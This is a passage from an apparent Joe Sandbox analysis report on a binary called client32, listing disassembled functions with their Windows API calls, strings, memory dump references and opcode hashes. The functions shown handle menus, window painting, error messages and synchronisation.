                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                • API String ID: 863766397-389219706
                                                                                                                                                                                • Opcode ID: ea2e8aad070b3691c374c3e1df9b8cd862197edf3982c068346eb246e0b3798d
                                                                                                                                                                                • Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
                                                                                                                                                                                • Opcode Fuzzy Hash: ea2e8aad070b3691c374c3e1df9b8cd862197edf3982c068346eb246e0b3798d
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1
                                                                                                                                                                                Function 1115F620 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                                                                                                                  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                                                                                                • CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
                                                                                                                                                                                • EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
                                                                                                                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMenu$CheckCountEnableInfoVersion
                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                • API String ID: 398393929-4108050209
                                                                                                                                                                                • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                                                                                                                • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                                                                                                                                • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                                                                                                                • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
                                                                                                                                                                                Function 110812A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 74COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • _memmove.LIBCMT ref: 1108132F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                                                                                                                • API String ID: 1528188558-4264523126
                                                                                                                                                                                • Opcode ID: 35601839cccb0670603f022c009c5a056c4a19c9e56e72b5bb088890195482b1
                                                                                                                                                                                • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                                                                                                                • Opcode Fuzzy Hash: 35601839cccb0670603f022c009c5a056c4a19c9e56e72b5bb088890195482b1
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                                                                                                                Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                                                                                                                • API String ID: 2735369351-763374134
                                                                                                                                                                                • Opcode ID: be7a5315f858f70bf7172d7bccddf800f33fbc2ac9b3c60ccf3dfde21de53444
                                                                                                                                                                                • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                                                                                                                • Opcode Fuzzy Hash: be7a5315f858f70bf7172d7bccddf800f33fbc2ac9b3c60ccf3dfde21de53444
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                                                                                                                Function 110056A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 110056E8
                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 1100572F
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 110056C8
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 1216912278-2830328467
                                                                                                                                                                                • Opcode ID: 167cfc9cc01ef20cf78e4ff4f58d9de11f09aa6fa70302b4900e70e25264f921
                                                                                                                                                                                • Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
                                                                                                                                                                                • Opcode Fuzzy Hash: 167cfc9cc01ef20cf78e4ff4f58d9de11f09aa6fa70302b4900e70e25264f921
                                                                                                                                                                                • Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
                                                                                                                                                                                Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                                                                                                                  • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                                                                                                  • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                                                                                                                  • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                                                                                                  • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                                                                                                  • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                                                                                                • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                                                                                                                • _free.LIBCMT ref: 1100B3C8
                                                                                                                                                                                • _free.LIBCMT ref: 1100B3CE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 705253285-0
                                                                                                                                                                                • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                                                                                • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                                                                                • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                                                                                                                Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                                • Opcode ID: 864d7c50d9d58f1f3b53787e7d6c501528741f69bb5e36d7664cc8d2426a1424
                                                                                                                                                                                • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                                                                                                                • Opcode Fuzzy Hash: 864d7c50d9d58f1f3b53787e7d6c501528741f69bb5e36d7664cc8d2426a1424
                                                                                                                                                                                • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                                                                                                                Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                                • Opcode ID: 2ecfc389e82650b2eda5b6ef997e3ecba0293e669e2208f110f6783185de593e
                                                                                                                                                                                • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 2ecfc389e82650b2eda5b6ef997e3ecba0293e669e2208f110f6783185de593e
                                                                                                                                                                                • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                                                                                                                Function 1105B730 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadMenuA.USER32(00000000,00001042), ref: 1105B73D
                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1105B763
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 1105B790
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
